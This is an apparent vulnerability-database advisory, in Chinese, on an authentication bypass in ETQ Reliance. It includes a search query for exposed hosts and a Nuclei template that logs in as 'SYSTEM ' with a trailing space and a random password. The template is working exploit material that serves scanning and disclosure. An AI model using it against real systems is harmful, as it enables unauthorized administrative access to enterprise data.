ETQ Reliance 认证绕过漏洞

漏洞信息

漏洞名称: ETQ Reliance 认证绕过漏洞

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: ETQ Reliance是一款企业级的质量管理软件,广泛应用于制造业、医疗保健和金融服务等行业,帮助企业实现质量管理的自动化和标准化。该软件通常部署在企业内部网络中,作为关键的业务系统运行。此次发现的认证绕过漏洞允许攻击者通过简单的用户名构造技巧,无需有效密码即可获得系统最高权限。具体来说,攻击者只需在用户名’SYSTEM’后添加一个空格(即’SYSTEM ‘),即可绕过认证机制,直接以SYSTEM账户身份登录系统。这一漏洞的根源在于系统对用户名输入的处理不当,未能正确过滤或验证用户名中的空格字符,导致认证逻辑被绕过。由于SYSTEM账户通常拥有系统的最高权限,攻击者利用此漏洞可以完全控制受影响的ETQ Reliance系统,执行任意操作,包括查看、修改或删除敏感数据,甚至进一步渗透企业内网。此漏洞的利用无需任何前置条件,且攻击过程可以自动化,极大地增加了企业面临的安全风险。

产品厂商: ETQ

产品名称: ETQ Reliance

搜索语法: html:”ETQ Reliance”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8a43448e7c0822f33b45fc434a328237d4762d85/http%2Fmisconfiguration%2Fetq-reliance-auth-bypass.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: etq-reliance-auth-bypass

info:
  name: ETQ Reliance - Authentication Bypass
  author: assetnote,DhiyaneshDK
  severity: critical
  description: |
    An authentication bypass vulnerability exists in ETQ Reliance's login mechanism, where submitting the SYSTEM username followed by a trailing space ("SYSTEM ") allows unauthenticated users to gain full access as the SYSTEM account. This critical flaw effectively bypasses authentication controls and grants administrative-level access to the application.
  reference:
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  metadata:
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: etq-reliance,auth-bypass

variables:
  username: "SYSTEM "
  password: "{{to_lower(rand_text_alphanumeric(7))}}"

http:
  - raw:
      - |
        POST /reliance/resources/sessions HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "statusCode"
          - "userId"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"